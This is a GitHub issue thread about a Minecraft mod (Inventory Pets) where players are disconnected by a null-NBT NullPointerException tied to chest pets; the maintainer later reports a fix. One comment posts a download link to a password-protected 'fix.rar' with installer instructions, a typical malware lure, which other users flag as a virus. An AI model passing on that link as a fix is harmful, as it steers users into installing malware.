### ISSUE TITLE
Multiplayer issues in 1.20.1

### ISSUE THREAD

**Issue by Diliard** [capnkirok/Inventory-Pets#613]
Good evening,

I've been encountering connection issues with a modpack ive been playing with friends for a while now, sporadically occuring issues of not being able to connect due to the disconnect message "Internal exception: java.lang.nullpointerexception: cannot invoke "net.minecraft.nbt.compoundTag.m_128471_(string)" because "nbt" is null"

~~it must be caused by inventory pets as ive cross referenced different forum post of people having the same issue where the only constants the mod.~~ I've also found a Minecraft Forum post of a player experiencing this without inventory pets. (I still decided to post this as from the other post it seems that inventory pets might tie in too and in best case the issues just closed due to being unaffiliated and in worst case a bug is found/fixed.)

theres no further info provided in the crash log/working log and the server only disconnects the player under the guise of "lost connection: Disconnected
Internal exception: java.lang.nullpointerexception: cannot invoke "net.minecraft.nbt.compoundTag.m_128471_(string)" because "nbt" is null"

the disconnect also occured to me once when i went into creative and spawned in a sated double chest pet, occuring exactly when i put it in my inventory -- relogging worked for me but the double chest was deleted/not saved. using the /give command worked flawlessly for the sated double chest pet.

Version 2.1.2 was used.

Modpack (curseforge) incase investigations end up with it being a mod incompatibility:
[modpack.zip](https://github.com/user-attachments/files/16750950/modpack.zip)

Cross referenced posts mentioned earlier:

https://forums.minecraftforge.net/topic/150517-internalexception-cannot-invoke-netminecraftnbtcompoundtagm_128471_string/

https://www.minecraftforum.net/forums/support/java-edition-support/3204151-nullpointerexception-when-joining-server

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by axolotltilt** [comment]
virus :(

**Comment by YoungAgile** [comment]
> virus :(

Sorry, the account has been hacked. Please do not click on this link.

**Comment by capnkirok** [comment]
Thanks for the detail. Chest Pets can error when the chest contents are accessed without the Chest Pet first being opened or placed in player inventory. This only happens as the result of another mod which lacks safeguards. The default title of the chest pet is not assigned and results in this error. I've placed in a number of safeguards on my end, but it may be that whatever mod is causing this conflict is accessing before the safeguard has a chance to work and certainly not checking to see if the data is valid. I can take a look at your modpack to see what might be causing the conflict, but not until mid-September, as we are in the middle of an international move.

**Comment by Diliard** [comment]
Thanks for the response, the reason i didnt include the detail with the chest pet in my original issue ticket is because ive had players on my server in the past struggle with connecting to the server for their first time -- the crash persisting even after deleting newly created empty playerdata.

<img width="1641" alt="image" src="https://github.com/user-attachments/assets/e2cc7cfb-4d32-4c2c-a4b0-26a156b4cfea">

After trying to locate the compatibility issue ive found that it must be the mod itself as you can see by the above screenshot, cheating in a double chest from the creative menu gets me disconnected but ive only installed the minimum.

ALTHOUGH, i wanna mention that its a different CompoundTag, m_128425 is null this time.

**Comment by capnkirok** [comment]
Thanks Diliard, for the additional testing. I've done tons of testing dropping in Chests from Creative, so this is surprising. I'll take a look in mid-September when I have access to the source again.

**Comment by Diliard** [comment]
Hope the move works out flawlessly^^

**Comment by capnkirok** [comment]
Ok, this has been fixed in Dev. Look for 2.1.3 version at the end of this month. See #608
